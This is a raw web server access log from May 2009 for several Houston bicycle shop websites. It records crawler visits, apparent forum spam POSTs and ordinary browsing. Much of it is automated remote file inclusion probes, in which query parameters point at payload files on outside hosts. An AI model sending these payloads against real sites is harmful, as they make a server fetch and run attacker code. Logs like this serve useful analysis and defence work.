62.116.168.108 - - [10/May/2009:06:42:14 -0700] "GET /translations/Danish.txt////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.116.168.108 - - [10/May/2009:06:42:14 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.116.168.108 - - [10/May/2009:06:42:14 -0700] "GET /translations////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 3862 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:06:45:16 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
62.116.168.108 - - [10/May/2009:06:46:35 -0700] "GET /translations/Russian.txt%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.116.168.108 - - [10/May/2009:06:46:35 -0700] "GET /translations/Italian.txt%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.116.168.108 - - [10/May/2009:06:46:35 -0700] "GET /translations/Spanish.txt%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.116.168.108 - - [10/May/2009:06:46:35 -0700] "GET /translations/Swedish.txt%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.116.168.108 - - [10/May/2009:06:46:35 -0700] "GET /translations////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 3862 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.116.168.108 - - [10/May/2009:06:46:35 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1765 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.116.168.108 - - [10/May/2009:07:00:05 -0700] "GET /translations/Swedish.txt////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.116.168.108 - - [10/May/2009:07:00:05 -0700] "GET /translations/Spanish.txt////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
74.6.17.157 - - [10/May/2009:07:04:57 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:07:08:23 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:07:08:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
62.116.168.108 - - [10/May/2009:07:17:16 -0700] "GET /translations/Portuguese_BR.txt////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.116.168.108 - - [10/May/2009:07:17:16 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "www.svbikes.com"
62.116.168.108 - - [10/May/2009:07:17:16 -0700] "GET /translations////?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 3862 "-" "Mozilla/5.0" "www.svbikes.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations/Danish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations/Danish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:18:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:19:08 -0700] "GET /translations/Turkish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:19:08 -0700] "GET /translations/Turkish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:19:21 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:19:21 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:19:21 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:19:21 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:19:21 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:19:21 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:19:21 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:19:27 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:19:27 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:19:27 -0700] "GET /translations/Danish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:19:27 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:19:27 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:19:27 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:19:27 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:07:20:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
78.24.9.102 - - [10/May/2009:07:20:26 -0700] "GET /logs/access.log/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:20:26 -0700] "GET /errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:20:26 -0700] "GET /logs/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:20:48 -0700] "GET /logs/access.log/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
78.24.9.102 - - [10/May/2009:07:20:48 -0700] "GET /logs/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:07:22:59 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:07:27:02 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:07:28:51 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:07:32:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
222.236.44.32 - - [10/May/2009:07:34:39 -0700] "GET /translations/Russian.txt//ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/May/2009:07:34:39 -0700] "GET /translations/Italian.txt//ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/May/2009:07:34:40 -0700] "GET /translations//ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/May/2009:07:34:40 -0700] "GET /ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/May/2009:07:34:40 -0700] "GET /translations//ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.236.44.32 - - [10/May/2009:07:34:40 -0700] "GET /translations/Swedish.txt//ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.236.44.32 - - [10/May/2009:07:34:40 -0700] "GET /ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.236.44.32 - - [10/May/2009:07:34:40 -0700] "GET /translations/Turkish.txt//ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
222.236.44.32 - - [10/May/2009:07:36:41 -0700] "GET /translations/Portuguese_BR.txt//ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
222.236.44.32 - - [10/May/2009:07:36:41 -0700] "GET //ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
222.236.44.32 - - [10/May/2009:07:36:41 -0700] "GET /translations//ws/get_events.php?includedir=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
72.30.78.244 - - [10/May/2009:07:44:11 -0700] "GET /bullitinboard/viewtopic.php?p=14051 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:07:54:36 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:08:01:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
74.6.17.160 - - [10/May/2009:08:04:46 -0700] "GET /bullitinboard/viewtopic.php?p=13313 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
63.111.105.6 - - [10/May/2009:08:11:52 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
63.111.105.6 - - [10/May/2009:08:11:52 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
63.111.105.6 - - [10/May/2009:08:11:52 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:08:47:41 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:08:47:42 -0700] "GET /bullitinboard/viewtopic.php?p=1662 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:08:47:43 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:08:47:47 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:08:47:47 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/May/2009:09:24:40 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.30.142.82 - - [10/May/2009:09:36:03 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
208.80.195.37 - - [10/May/2009:09:37:55 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; ESB{38D0E5D1-2395-4E13-9B18-1FC7D507FAB5}; FunWebProducts; .NET CLR 1.1.4322)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/May/2009:09:39:07 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
119.63.193.62 - - [10/May/2009:09:41:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
91.121.150.170 - - [10/May/2009:09:45:39 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
70.140.190.194 - - [10/May/2009:09:49:02 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:49:03 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:49:06 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
67.82.118.147 - - [10/May/2009:09:49:15 -0700] "GET /logs/access_081010.log HTTP/1.1" 200 16806774 "http://www.google.com/search?q=littleindiansex&rls=com.microsoft:es-ES:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7ACAW" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "houstonbikeshop.com"
70.140.190.194 - - [10/May/2009:09:49:21 -0700] "GET /fit.html HTTP/1.1" 200 17443 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:49:21 -0700] "GET /images/fit2.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:49:21 -0700] "GET /images/SVB_Logos_gif_version_1_.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:49:34 -0700] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:49:38 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:49:42 -0700] "GET /blog/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:49:53 -0700] "GET /P1000199.JPG HTTP/1.1" 200 1640919 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:50:01 -0700] "GET /tmp/ HTTP/1.1" 200 659 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:50:03 -0700] "GET /tmp/mailError.log HTTP/1.1" 200 4160 "http://www.svbikes.com/tmp/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:50:11 -0700] "GET /logs/ HTTP/1.1" 200 2368 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:50:15 -0700] "GET /logs/access.log HTTP/1.1" 200 121299 "http://www.svbikes.com/logs/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:50:50 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:51:01 -0700] "GET /translations/ HTTP/1.1" 200 3847 "http://www.svbikes.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
70.140.190.194 - - [10/May/2009:09:51:04 -0700] "GET /translations/English-US.txt HTTP/1.1" 200 32000 "http://www.svbikes.com/translations/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.10) Gecko/2009042805 Firefox/3.0.1 (Debian-3.0.9-1)" "www.svbikes.com"
81.19.67.243 - - [10/May/2009:09:53:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:05:27 -0700] "GET /translations/Russian.txt/?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:05:27 -0700] "GET /?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:05:27 -0700] "GET /translations/?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 200 3847 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:06:03 -0700] "GET /?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:06:03 -0700] "GET /translations/Russian.txt/?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:06:03 -0700] "GET /translations/?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 200 3847 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:06:49 -0700] "GET /?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:06:49 -0700] "GET /translations/?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 200 3847 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.83.196 - - [10/May/2009:10:06:49 -0700] "GET /translations/Russian.txt/?noSet=0&includedir=http://www9.moolbit.org/bbs/data/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.199.222.19 - - [10/May/2009:10:17:34 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.199.222.19 - - [10/May/2009:10:17:34 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
